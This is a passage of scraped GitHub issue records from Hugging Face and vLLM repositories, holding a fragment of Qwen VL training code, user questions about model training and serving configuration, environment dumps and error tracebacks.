Path(__file__).parent.parent.parent\nsys.path.append(str(project_root))\n\nimport qwenvl.train.trainer\nfrom trainer import replace_qwen2_vl_attention_class\n\nfrom transformers import (\n Qwen2VLForConditionalGeneration,\n)\n\nfrom model_code.modeling_qwen2_5_vl import Qwen2_5_VLForConditionalGeneration\n\n\n# from qwenvl.data.data_qwen import make_supervised_data_module\nfrom qwenvl.data.lmm_dataset_for_batch import make_supervised_data_module\nfrom qwenvl.train.argument import (\n ModelArguments,\n DataArguments,\n TrainingArguments,\n)\nfrom transformers import AutoTokenizer, AutoProcessor, Qwen2VLImageProcessor, Trainer\n\nlocal_rank = None\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\n\ndef rank0_print(*args):\n if local_rank == 0:\n print(*args)\n\n\ndef add_special_tokens_safely(tokenizer, new_tokens):\n \"\"\"\n \u5b89\u5168\u5730\u5411 tokenizer \u6dfb\u52a0\u65b0\u7684 special tokens\uff0c\u4fdd\u7559\u539f\u6709\u7684 additional_special_tokens\u3002\n\n Args:\n tokenizer: Hugging Face tokenizer\n model: \u5bf9\u5e94\u7684\u8bed\u8a00\u6a21\u578b\n new_tokens: list of str, \u8981\u6dfb\u52a0\u7684\u65b0 token\n\n Returns:\n bool: \u662f\u5426\u6709\u65b0 token \u88ab\u6dfb\u52a0\n \"\"\"\n # \u83b7\u53d6\u5f53\u524d\u8bcd\u8868\u4e2d\u7684\u6240\u6709 token\n current_vocab = set(tokenizer.get_vocab().keys())\n\n # \u8fc7\u6ee4\u51fa\u771f\u6b63\u9700\u8981\u6dfb\u52a0\u7684 token\n tokens_to_add = [t for t in new_tokens if t not in current_vocab]\n if not tokens_to_add:\n rank0_print(\"\ud83d\udfe2 \u6240\u6709\u6307\u5b9a\u7684 token \u5df2\u5b58\u5728\u4e8e\u8bcd\u8868\u4e2d\uff0c\u65e0\u9700\u6dfb\u52a0\u3002\")\n return False\n\n # \u83b7\u53d6\u539f\u6709 additional_special_tokens\uff08\u5982 , \u7b49\uff09\n orig_special_tokens = tokenizer.special_tokens_map.get(\n \"additional_special_tokens\", []\n )\n\n # \u5408\u5e76\uff1a\u4fdd\u7559\u539f\u6709 + \u65b0\u589e\n updated_special_tokens = orig_special_tokens + [\n t for t in tokens_to_add if t not in orig_special_tokens\n ]\n\n rank0_print(f\"\ud83d\udccc \u6b63\u5728\u6dfb\u52a0\u65b0 token: {tokens_to_add}\")\n rank0_print(f\"\ud83d\udd27 \u66f4\u65b0\u540e\u7684 additional_special_tokens \u603b\u6570: {len(updated_special_tokens)}\")\n\n # \u4f7f\u7528 add_special_tokens API\uff08\u4f1a\u81ea\u52a8\u53bb\u91cd\uff09\n num_added = tokenizer.add_special_tokens(\n {\"additional_special_tokens\": updated_special_tokens}\n )\n\n if num_added > 0:\n rank0_print(f\"\u2705 \u6210\u529f\u6dfb\u52a0 {num_added} \u4e2a\u65b0 token \u5230\u8bcd\u8868\")\n\n return num_added > 0\n\n\ndef safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str):\n \"\"\"Collects the state dict and dump to disk.\"\"\"\n\n if trainer.deepspeed:\n torch.cuda.synchronize()\n trainer.save_model(output_dir)\n return\n\n state_dict = trainer.model.state_dict()\n if trainer.args.should_save:\n cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\n del state_dict\n trainer._save(output_dir, state_dict=cpu_state_dict) # noqa\n\n\ndef set_model(model_args, model):\n if model_args.tune_mm_vision:\n for n, p in model.visual.named_parameters():\n p.requires_grad = True\n else:\n for n, p in model.visual.named_parameters():\n p.requires_grad = False\n\n if model_args.tune_mm_mlp:\n for n, p in model.visual.merger.named_parameters():\n p.requires_grad = True\n else:\n for n, p in model.visual.merger.named_parameters():\n p.requires_grad = False\n\n if model_args.tune_mm_llm:\n for n, p in model.model.named_parameters():\n p.requires_grad = True\n model.lm_head.requires_grad = True\n else:\n for n, p in model.model.named_parameters():\n p.requir", "url": "https://github.com/huggingface/transformers/issues/41533", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-12T13:50:40Z", "updated_at": "2025-10-13T14:09:29Z", "comments": 3, "user": "jialiangZ" }, { "repo": "huggingface/lerobot", "number": 2181, "title": "How to chage SmolVLA action_chunk_size?", "body": "I want to change 'action_chunk_size' from 50 to 10. I ran the command like this : \n'''\npython lerobot/scripts/train.py --policy.path=lerobot/smolvla_base --dataset.repo_id=Datasets/grasp_put --batch_size=16 --steps=40000 --output_dir=outputs/train/vla_chunk10 --job_name=smolvla_training --policy.device=cuda --policy.push_to_hub=false --policy.action_chunk_size=10\n'''\nbut it doesn't work\n'train.py: error: unrecognized arguments: --action_chunk_size=10'\nand I found it can enter this parameter in the terminal :\nusage: train.py [-h] [--policy.action_chunk_size str]\n\nHow should I resolve this problem?", "url": "https://github.com/huggingface/lerobot/issues/2181", "state": "closed", "labels": [ "question", "policies", "python" ], "created_at": "2025-10-12T13:29:35Z", "updated_at": "2025-10-17T11:25:55Z", "user": "CCCY-0304" }, { "repo": "huggingface/transformers", "number": 41532, "title": "where is examples/rag from original paper?", "body": "### System Info\n\nhttps://arxiv.org/pdf/2005.11401 mentions https://github.com/huggingface/transformers/blob/main/examples/rag but it is not there. Add redirect if possible\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nGo to https://github.com/huggingface/transformers/blob/main/examples/rag\n\n### Expected behavior\n\nsome example instead of 404", "url": "https://github.com/huggingface/transformers/issues/41532", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-12T13:17:53Z", "updated_at": "2025-10-17T09:34:15Z", "user": "IgorKasianenko" }, { "repo": "vllm-project/vllm", "number": 26653, "title": "[Usage]: Qwen3VL image coordinates issue", "body": "### Your current environment\n\nHi, i found same image, same prompt, the vLLM serving qwen3vl always have wrong cooridnates back.\n\nthis is vllm return:\n\nResponse: \"{\\\"click_type\\\": \\\"left_click\\\", \\\"coordinate\\\": [815, 961]}\"\n\n\"Image\"\n\nAs you can see, when visualize, the VLLM returned x offset is totally far wrong.\n\nQwen3 official return. Same A3B model.\n\nDoes the input were cropped or something? \n\nMy server side just used: \n\n```\nvllm serve checkpoints/Qwen3-VL-30B-A3B-Instruct \\\n --dtype auto --max-model-len 4096 \\\n --api-key token-abc123 \\\n --gpu_memory_utilization 0.9 \\\n --trust-remote-code \\\n --port 8000 \\\n --served-model-name 'qwen3-vl' \\\n --max-model-len 8k \\\n --limit-mm-per-prompt '{\"video\": 3}' \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes \n```\n\n**note**: when visualize i have already mapping the cordiantes to image space, here just compare raw output, it still biased much on x-axis.\n\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\ndfwr\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26653", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-12T07:02:29Z", "updated_at": "2025-10-13T03:56:53Z", "comments": 2, "user": "lucasjinreal" }, { "repo": "huggingface/accelerate", "number": 3811, "title": "ValueError: Could not find the transformer layer class QwenImageTransformerBlock in the model.", "body": "Hi, I am trying to fine-tuning qwen-image-edit using accelerate in FSDP mode. I want to warp the ``QwenImageTransformerBlock`` in transformer and ``Qwen2_5_VLVisionBlock,Qwen2_5_VLDecoderLayer`` in text_encoder. I set the environment param\n```\ndef set_fsdp_env():\n os.environ[\"ACCELERATE_USE_FSDP\"] = 'true'\n os.environ[\"FSDP_AUTO_WRAP_POLICY\"] = 'TRANSFORMER_BASED_WRAP'\n os.environ[\"FSDP_BACKWARD_PREFETCH\"] = 'BACKWARD_PRE'\n os.environ[\"FSDP_TRANSFORMER_CLS_TO_WRAP\"] = 'QwenImageTransformerBlock,Qwen2_5_VLVisionBlock,Qwen2_5_VLDecoderLayer'\n os.environ[\"FSDP_CPU_RAM_EFFICIENT_LOADING\"] = 'false'\n```\nand prepare the two models\n```\ntransformer = accelerator.prepare(transformer)\ntext_encoder = accelerator.prepare(text_encoder)\n```\nFinally, I encountered the error raised from ``text_encoder = accelerator.prepare(text_encoder)``\n```\nValueError: Could not find the transformer layer class QwenImageTransformerBlock in the model.\n```\nHow can I resolve this problem? Thanks!\n", "url": "https://github.com/huggingface/accelerate/issues/3811", "state": "closed", "labels": [], "created_at": "2025-10-11T10:13:14Z", "updated_at": "2025-11-22T15:06:54Z", "comments": 2, "user": "garychan22" }, { "repo": "huggingface/lerobot", "number": 2172, "title": "Add support for remote GPUs (with async inference!)", "body": "Hello,\nI'm a student in not the first-world country, and unforturnately, I don't own a PC that would have an NVidia GPU - it costs about $1200 for a decent setup. On the other hand, it costs only $0.12-0.24/hr to rent RTX 4090 instances, so it's pretty cheap to simply rent a computer whenever I need to data collect/train.\n\nBut, to my knowledge LeRobot - unlike e.g. most LLM or vision trainers - runs only locally. I haven't tried, but given Async Inference it should be very feasible to make streaming to a local browser from a remote instance. In particular, for data collection. \n\nThis will make robotics dataset generation (significantly) more accessible.\n\nI may be able to PR this one, it should be straightforward.\n\nCheers.", "url": "https://github.com/huggingface/lerobot/issues/2172", "state": "open", "labels": [ "enhancement", "question" ], "created_at": "2025-10-11T08:49:32Z", "updated_at": "2025-12-19T06:35:21Z", "user": "MRiabov" }, { "repo": "huggingface/transformers", "number": 41518, "title": "Add Structured Prompt Templates Registry for LLM / VLM / Diffusion Tasks", "body": "### Feature request\n\nIntroduce transformers.prompt_templates \u2014 a YAML-based registry and accessor API:\n\n```\nfrom transformers import PromptTemplates\n\nPromptTemplates.get(\"summarization\") # \"Summarize the following text:\"\nPromptTemplates.list_tasks() # [\"summarization\",\"vqa\",\"ocr\",...]\n```\n\n- Templates stored as yaml/json under src/transformers/prompt_templates/templates/.\n- Accessor + validation in registry.py.\n- Optional CLI command transformers-cli list-prompts.\n- Pipelines can import a template by task name instead of hard-coding.\n\n### Motivation\n\nEvery pipeline and model today embeds its own prompt strings (e.g., summarization, OCR, VQA).\nThis duplication makes results inconsistent and hard to benchmark.\nA central registry of task-specific prompt templates would unify defaults and enable easy community additions.\n\n### Your contribution\n\nI\u2019ll implement the registry module, add unit tests and docs, and migrate 1\u20132 pipelines (summarization / captioning) to use it.\nContributor: [@Aki-07](https://github.com/Aki-07)", "url": "https://github.com/huggingface/transformers/issues/41518", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-10-11T08:10:20Z", "updated_at": "2025-10-13T15:06:20Z", "comments": 2, "user": "Aki-07" }, { "repo": "vllm-project/vllm", "number": 26616, "title": "[Usage]: How to enable MTP when using Qwen3-Next in local infer ( not vllm serve)", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.2 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. | (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-4.18.0-2.6.8.kwai.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 11.8.89\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA A100 80GB PCIe\nGPU 1: NVIDIA A100 80GB PCIe\nGPU 2: NVIDIA A100 80GB PCIe\nGPU 3: NVIDIA A100 80GB PCIe\n\nNvidia driver version : 550.54.14\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.9.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 96\nOn-line CPU(s) list: 0-95\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7V13 64-Core Processor\nCPU family: 25\nModel: 1\nThread(s) per core: 1\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 1\nBogoMIPS: 4890.88\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid aperfmperf pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core invpcid_single vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves clzero xsaveerptr arat umip vaes vpclmulqdq rdpid\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 3 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 48 MiB (96 instances)\nL3 cache: 384 MiB (12 instances)\nNUMA node(s): 4\nNUMA node0 CPU(s): 0-23\nNUMA node1 CPU(s): 24-47\nNUMA node2 CPU(s): 48-71\nNUMA node3 CPU(s): 72-95\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Vulnerable: __user pointer sanitization and usercopy barriers only; no swapgs barriers\nVulnerability Spectre v2: Vulnerable, STIBP: disabled\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.3\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.8.0\n[pip3] torchaudio==2.8.0\n[pip3] torchvision==0.23.0\n[pip3] transformers==4.57.0\n[pip3] triton==3.4.0\n[conda] nu", "url": "https://github.com/vllm-project/vllm/issues/26616", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-11T03:58:14Z", "updated_at": "2025-10-16T08:45:35Z", "comments": 1, "user": "Kimagure7" }, { "repo": "vllm-project/vllm", "number": 26614, "title": "[Usage]: attn_metadata.seq_lens is not equal to attn_metadata.num_actual_tokens", "body": "### Your current environment\n\n```\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.6 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.31\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jul 23 2025, 00:34:44) [Clang 20.1.4 ] (64-bit runtime)\nPython platform : Linux-5.4.0-216-generic-x86_64-with-glibc2.31\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 555.42.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 52 bits physical, 57 bits virtual\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 2\nNUMA node(s): 2\nVendor ID: GenuineIntel\nCPU family: 6\nModel: 143\nModel name: Intel(R) Xeon(R) Platinum 8480+\nStepping: 8\nFrequency boost: enabled\nCPU MHz: 900.000\nCPU max MHz: 2001.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4000.00\nVirtualization: VT-x\nL1d cache: 5.3 MiB\nL1i cache: 3.5 MiB\nL2 cache: 224 MiB\nL3 cache: 210 MiB\nNUMA node0 CPU(s): 0-55,112-167\nNUMA node1 CPU(s): 56-111,168-223\nVulnerability Gather data sampling: Not affected\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional; RSB filling; PBRSB-eIBRS SW sequence; BHI BHI_DIS_S\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx512_bf16 wbnoinvd dtherm ida arat pln pts avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq rdpid cldemote movdiri movdir64b md_clear pconfig flush_l1d arch_capabilities\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.0\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-", "url": "https://github.com/vllm-project/vllm/issues/26614", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-11T03:35:38Z", "updated_at": "2025-10-11T03:36:31Z", "comments": 0, "user": "betacatZ" }, { "repo": "vllm-project/vllm", "number": 26612, "title": "[Usage]: qwen3vl 30 A3B \u542f\u52a8vllm \u670d\u52a1\u62a5\u9519", "body": "### \ud83d\udcda The doc issue\n\nA_A800-SXM4-80GB.json']\n(Worker pid=1939690) INFO 10-11 10:42:13 [monitor.py:34] torch.compile takes 85.33 s in total\n(Worker pid=1939690) INFO 10-11 10:42:14 [gpu_worker.py:298] Available KV cache memory: 13.69 GiB\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] EngineCore failed to start.\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] Traceback (most recent call last):\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 699, in run_engine_core\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 498, in __init__\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] super().__init__(vllm_config, executor_class, log_stats,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 92, in __init__\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] self._initialize_kv_caches(vllm_config)\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 199, in _initialize_kv_caches\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] kv_cache_configs = get_kv_cache_configs(vllm_config, kv_cache_specs,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/core/kv_cache_utils.py\", line 1243, in get_kv_cache_configs\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] check_enough_kv_cache_memory(vllm_config, kv_cache_spec_one_worker,\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/core/kv_cache_utils.py\", line 716, in check_enough_kv_cache_memory\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] raise ValueError(\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:14 [core.py:708] ValueError: To serve at least one request with the models's max seq len (262144), (24.00 GiB KV cache is needed, which is larger than the available KV cache memory (13.69 GiB). Based on the available memory, the estimated maximum model length is 149520. Try increasing `gpu_memory_utilization` or decreasing `max_model_len` when initializing the engine.\n(EngineCore_DP0 pid=1937911) ERROR 10-11 10:42:17 [multiproc_executor.py:154] Worker proc VllmWorker-0 died unexpectedly, shutting down executor.\n(EngineCore_DP0 pid=1937911) Process EngineCore_DP0:\n(EngineCore_DP0 pid=1937911) Traceback (most recent call last):\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/anaconda3_flash_attn/envs/qwen3_vl/lib/python3.12/multiprocessing/process.py\", line 314, in _bootstrap\n(EngineCore_DP0 pid=1937911) self.run()\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/anaconda3_flash_attn/envs/qwen3_vl/lib/python3.12/multiprocessing/process.py\", line 108, in run\n(EngineCore_DP0 pid=1937911) self._target(*self._args, **self._kwargs)\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 712, in run_engine_core\n(EngineCore_DP0 pid=1937911) raise e\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 699, in run_engine_core\n(EngineCore_DP0 pid=1937911) engine_core = EngineCoreProc(*args, **kwargs)\n(EngineCore_DP0 pid=1937911) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 498, in __init__\n(EngineCore_DP0 pid=1937911) super().__init__(vllm_config, executor_class, log_stats,\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 92, in __init__\n(EngineCore_DP0 pid=1937911) self._initialize_kv_caches(vllm_config)\n(EngineCore_DP0 pid=1937911) File \"/home/ma-user/work/renkexuan/.venv/lib/python3.12/site-packages/vllm/v1/engine/core.py\", line 199, in _initialize_kv_caches\n(EngineCore_DP0 pid=1937911) kv_cache_configs = get_kv_cache_configs(vllm_config, kv_cache_specs,\n(EngineCore_DP0 pid=1937911) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n(Engin", "url": "https://github.com/vllm-project/vllm/issues/26612", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-11T02:45:20Z", "updated_at": "2025-10-16T23:00:39Z", "comments": 1, "user": "renkexuan369" }, { "repo": "huggingface/lerobot", "number": 2171, "title": "Data diffusion and data format conversion", "body": "1. Can datasets collected in Lerobot format be disseminated?\n2. Can data formats between different Lerobot versions be converted? I noticed that the data format collected in version 0.2.0 is different from the latest data format.\nThank you!", "url": "https://github.com/huggingface/lerobot/issues/2171", "state": "open", "labels": [ "question", "dataset" ], "created_at": "2025-10-11T02:16:55Z", "updated_at": "2025-10-17T02:02:36Z", "user": "FALCONYU" }, { "repo": "vllm-project/vllm", "number": 26607, "title": "[Bug]: Since version 0.9.2 comes with nccl built-in, using PCIE causes sys errors. How to disable nccl in vllm for versions after 0.9.2?", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nYour output of `python collect_env.py` here\n```\n\n
\n\n\"Image\"\n\n\n### \ud83d\udc1b Describe the bug\n\n sh 06_startVllmAPI.sh \nINFO 09-30 10:30:16 [__init__.py:216] Automatically detected platform cuda.\n(APIServer pid=1599676) INFO 09-30 10:30:17 [api_server.py:1896] vLLM API server version 0.10.2\n(APIServer pid=1599676) INFO 09-30 10:30:17 [utils.py:328] non-default args: {'port': 6006, 'model': './autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', 'tokenizer': './autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', 'trust_remote_code': True, 'dtype': 'bfloat16', 'served_model_name': ['Qwen2.5-72B-GeoGPT'], 'tensor_parallel_size': 8, 'gpu_memory_utilization': 0.5}\n(APIServer pid=1599676) The argument `trust_remote_code` is to be used with Auto classes. It has no effect here and is ignored.\n(APIServer pid=1599676) INFO 09-30 10:30:24 [__init__.py:742] Resolved architecture: Qwen2ForCausalLM\n(APIServer pid=1599676) `torch_dtype` is deprecated! Use `dtype` instead!\n(APIServer pid=1599676) INFO 09-30 10:30:24 [__init__.py:1815] Using max model len 131072\n(APIServer pid=1599676) INFO 09-30 10:30:24 [scheduler.py:222] Chunked prefill is enabled with max_num_batched_tokens=2048.\nINFO 09-30 10:30:29 [__init__.py:216] Automatically detected platform cuda.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [core.py:654] Waiting for init message from front-end.\n(EngineCore_DP0 pid=1600151) INFO 09-30 10:30:31 [core.py:76] Initializing a V1 LLM engine (v0.10.2) with config: model='./autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', speculative_config=None, tokenizer='./autodl-tmp/modelscope/models/GeoGPT/Qwen2.5-72B-GeoGPT', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=True, dtype=torch.bfloat16, max_seq_len=131072, download_dir=None, load_format=auto, tensor_parallel_size=8, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=None, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, decoding_config=DecodingConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_backend=''), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=Qwen2.5-72B-GeoGPT, enable_prefix_caching=True, chunked_prefill_enabled=True, use_async_output_proc=True, pooler_config=None, 